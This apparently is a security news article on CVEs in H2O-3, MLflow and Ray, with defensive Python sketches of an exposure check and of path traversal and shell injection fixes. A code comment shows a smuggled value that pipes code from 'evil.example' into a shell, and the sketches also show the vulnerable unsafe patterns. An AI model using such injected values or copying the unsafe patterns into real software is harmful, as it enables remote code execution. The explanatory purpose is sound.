Over a dozen vulnerabilities expose AI/ML models to system takeover and data theft

TL;DR:

  • Multiple vulnerabilities were uncovered in AI/ML tools like H2O-3, MLflow, and Ray.
  • Vulnerabilities expose AI/ML models to system takeover and data theft.
  • H2O-3’s default installation lacks authentication, allowing malicious Java objects to execute.
  • Critical RCE vulnerability in H2O-3 (CVE-2023-6016) enables full server takeover.
  • Additional issues in H2O-3: a local file inclusion flaw (CVE-2023-6038), an XSS bug (CVE-2023-6013), and an S3 bucket takeover (CVE-2023-6017).
  • MLflow also lacks default authentication and has four critical vulnerabilities.
  • The most severe in MLflow are arbitrary file write and path traversal bugs (CVE-2023-6018 and CVE-2023-6015).
  • Ray, an open-source framework, shares the authentication issue and has a critical code injection flaw (CVE-2023-6019).
  • Two critical local file inclusion vulnerabilities in Ray (CVE-2023-6020 and CVE-2023-6021).
  • All vulnerabilities were reported to vendors with a 45-day disclosure period.
  • Users are advised to update to non-vulnerable versions and restrict access in the absence of patches.

Main AI News:

Since August 2023, the Huntr bug bounty platform has been a hotbed of activity, with members unveiling more than a dozen vulnerabilities that pose a grave threat to artificial intelligence (AI) and machine learning (ML) models. These flaws expose widely used AI/ML tools to system takeover and theft of sensitive information, raising significant concerns within the industry.

These vulnerabilities were discovered in tools boasting hundreds of thousands, if not millions, of downloads per month. Prominent among them are H2O-3, MLflow, and Ray, each of which plays a pivotal role in the AI/ML ecosystem. The implications of these discoveries ripple throughout the AI/ML supply chain, emphasizing the need for immediate action and vigilance.

H2O-3, a low-code machine learning platform, offers a convenient means to create and deploy ML models through a user-friendly web interface. Its appeal lies in its simplicity: users can import data and remotely upload Java objects via API calls. Herein, however, lies the vulnerability: the default installation of H2O-3 is exposed to the network and lacks authentication, rendering it susceptible to exploitation. Attackers can supply malicious Java objects that H2O-3 unwittingly executes, thereby granting them access to the underlying operating system.
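
Because the exposure amounts to the service answering requests without credentials, administrators can quickly check whether a deployment is affected. The Python sketch below is illustrative only: it assumes H2O-3’s default port (54321) and its /3/About REST endpoint, and the host name is a placeholder.

    import requests

    # Hypothetical host; replace with the address of your own deployment.
    H2O_URL = "http://ml-server.internal:54321"

    try:
        # H2O-3's REST API serves /3/About; a 200 response to an
        # unauthenticated request suggests the instance is exposed.
        resp = requests.get(f"{H2O_URL}/3/About", timeout=5)
        if resp.ok:
            print("WARNING: H2O-3 instance answers without authentication.")
        else:
            print(f"Got HTTP {resp.status_code}; authentication may be enforced.")
    except requests.RequestException as exc:
        print(f"Instance unreachable: {exc}")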

The most menacing vulnerability, tracked as CVE-2023-6016 (CVSS score of 10), is a remote code execution (RCE) flaw that gives attackers complete control of the server. From there, they can pilfer critical models, credentials, and other sensitive data. This is a stark reminder of the perils lurking within AI/ML infrastructure.

In addition to the RCE flaw, diligent bug hunters discovered two other critical issues in this low-code service: a local file inclusion vulnerability (CVE-2023-6038) and a cross-site scripting (XSS) bug (CVE-2023-6013). Furthermore, a high-severity S3 bucket takeover vulnerability (CVE-2023-6017) compounds the risks, underscoring the urgent need for remediation.

MLflow, an open-source platform essential for managing the end-to-end ML lifecycle, mirrors H2O-3’s vulnerability posture. By default, it lacks authentication, leaving the door ajar for malicious actors. Researchers identified four critical vulnerabilities, with the most dire being arbitrary file write and path traversal bugs (CVE-2023-6018 and CVE-2023-6015, both carrying a CVSS score of 10). These vulnerabilities empower unauthenticated attackers to overwrite critical files on the operating system and execute remote code, a nightmare scenario for security professionals.
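
The disclosure does not reproduce the vulnerable code, but arbitrary file write and path traversal bugs generally share one well-known pattern: a user-controlled filename is joined onto a server-side directory without normalization. The following Python sketch contrasts that pattern with a containment check; it is a hypothetical illustration, not MLflow’s actual code, and the UPLOAD_ROOT directory is an assumed value.

    import os

    UPLOAD_ROOT = "/srv/mlflow/artifacts"  # assumed artifact directory

    def save_artifact_unsafe(filename: str, data: bytes) -> None:
        # Vulnerable pattern: a user-supplied name like "../../etc/cron.d/job"
        # escapes UPLOAD_ROOT and overwrites an arbitrary system file.
        with open(os.path.join(UPLOAD_ROOT, filename), "wb") as f:
            f.write(data)

    def save_artifact_safe(filename: str, data: bytes) -> None:
        # Mitigation: resolve the final path and verify it stays under the root.
        dest = os.path.realpath(os.path.join(UPLOAD_ROOT, filename))
        root = os.path.realpath(UPLOAD_ROOT)
        if not dest.startswith(root + os.sep):
            raise ValueError(f"path traversal attempt rejected: {filename!r}")
        with open(dest, "wb") as f:
            f.write(data)

Resolving the path with os.path.realpath before the containment check matters: it collapses any ".." components, so the comparison is made against the file that would actually be written.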

Furthermore, MLflow was found to be susceptible to critical-severity arbitrary file inclusion (CVE-2023-1177) and authentication bypass (CVE-2023-6014) vulnerabilities, further intensifying the threat landscape.

The Ray project, an open-source framework for distributed ML model training, echoes the alarming trend of lacking default authentication. A critical code injection vulnerability (CVE-2023-6019, CVSS score of 10) was uncovered in the format parameter of Ray’s cpu_profile endpoint, capable of triggering a complete system compromise. The flaw stems from inadequate validation of the parameter before it is used in a shell command.
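
Ray’s actual handler is not reproduced in the report, but the flaw class is classic shell injection, sketched below in Python. The allowlist, the process ID, and the choice of py-spy as the profiler are illustrative assumptions, not details from the advisory.

    import subprocess

    ALLOWED_FORMATS = {"flamegraph", "speedscope"}  # hypothetical allowlist

    def profile_unsafe(fmt: str, pid: int) -> None:
        # Vulnerable pattern: the request parameter is interpolated into a
        # shell command, so fmt = "flamegraph; curl evil.example | sh"
        # executes attacker-controlled code on the host.
        subprocess.run(f"py-spy record --format {fmt} --pid {pid}", shell=True)

    def profile_safe(fmt: str, pid: int) -> None:
        # Mitigation: validate against an allowlist and pass argv as a list,
        # so the value is never interpreted by a shell.
        if fmt not in ALLOWED_FORMATS:
            raise ValueError(f"unsupported format: {fmt!r}")
        subprocess.run(
            ["py-spy", "record", "--format", fmt, "--pid", str(pid)],
            check=True,
        )

Passing the argument vector as a list sidesteps the shell entirely, so even a malicious value can only fail validation, never execute.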

Bug hunters also unearthed two critical local file inclusion vulnerabilities in Ray (CVE-2023-6020 and CVE-2023-6021), allowing remote attackers to read arbitrary files on the Ray system.

It is worth noting that all vulnerabilities were reported to vendors a minimum of 45 days before public disclosure, emphasizing responsible disclosure practices. Users are urged to promptly update their installations to the latest non-vulnerable versions and institute stringent access restrictions where patches are unavailable.

Conclusion:

The discovery of numerous vulnerabilities in widely used AI/ML tools underscores the critical importance of cybersecurity in the AI/ML market. Organizations must prioritize security measures to protect their models and data, as these vulnerabilities pose significant risks to the AI/ML supply chain. Failure to address these issues can result in severe consequences, including data breaches and system compromise, with potential reputational and financial damage to businesses.

Source